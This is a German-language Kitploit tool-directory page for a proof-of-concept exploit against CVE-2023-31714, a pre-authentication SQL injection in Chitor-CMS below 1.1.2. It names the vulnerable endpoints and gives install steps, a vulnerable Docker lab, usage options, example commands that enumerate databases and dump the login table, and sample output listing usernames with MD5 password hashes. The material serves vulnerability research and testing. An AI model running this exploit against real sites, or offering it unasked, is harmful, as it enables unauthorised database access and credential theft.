Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-31714 — Proof-of-Concept-Exploit für CVE-2023-31714, eine SQL-Injection vor der Authentifizierung in Chitor-CMS < 1.1.2. Automatisiert die Datenbankaufzählung und das Extrahieren von Anmeldeinformationen über den Endpunkt /edit_school.php. | Kitploit
Tools/GitHubGitHub/msd0pe-1/cve-2023-31714
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsDatenbanksicherheit
GitHubmsd0pe-1/cve-2023-31714

CVE-2023-31714

Proof-of-Concept-Exploit für CVE-2023-31714, eine SQL-Injection vor der Authentifizierung in Chitor-CMS < 1.1.2. Automatisiert die Datenbankaufzählung und das Extrahieren von Anmeldeinformationen über den Endpunkt /edit_school.php.

Repository anzeigen
18vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-31714 - Chitor-CMS < 1.1.2 Pre-Auth SQL Injection

Gefunden von msd0pe
https://github.com/waqaskanju/Chitor-CMS
Projekt von waqaskanju

chitor1.1.py (Gefixt seit Commit 69d3442)

2023/04/13
Eine SQL-Injection wurde im Endpunkt /edit_school.php?id= gefunden und benötigt keine Authentifizierung.

chitor1.0.py (Wurde ab Commit 5f76192 zu einer Post-Auth SQL-Injection)

2023/04/09
SQL-Injections wurden in mehreren Endpunkten wie /add_school_class.php?school= gefunden und benötigen keine Authentifizierung. Seit dem Commit 5f76192 überprüfen diese Endpunkte, ob der angemeldete Benutzer Bearbeitungsrechte hat. Diese Überprüfung war zuvor bereits vorhanden, aber nicht funktionsfähig.

Installation

sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

TO START THE VULNERABLE DOCKER:
  - sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
  - sudo ./clean.sh

Verwendung

Usage: python chitor1.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target url
  --dbs                 list databases
  -D DATABASE, --db=DATABASE
                        select a database
  --tables              list tables
  -T TABLE, --table=TABLE
                        select a table
  --dump                dump the content

  Beispiele:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
  Quellcode von msd0pe gemeinfrei gestellt, kein Copyright
  Jegliche böswillige oder illegale Aktivitäten können strafbar sein
  Verwendung auf eigene Gefahr

Beispiel

python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
Tool herunterladen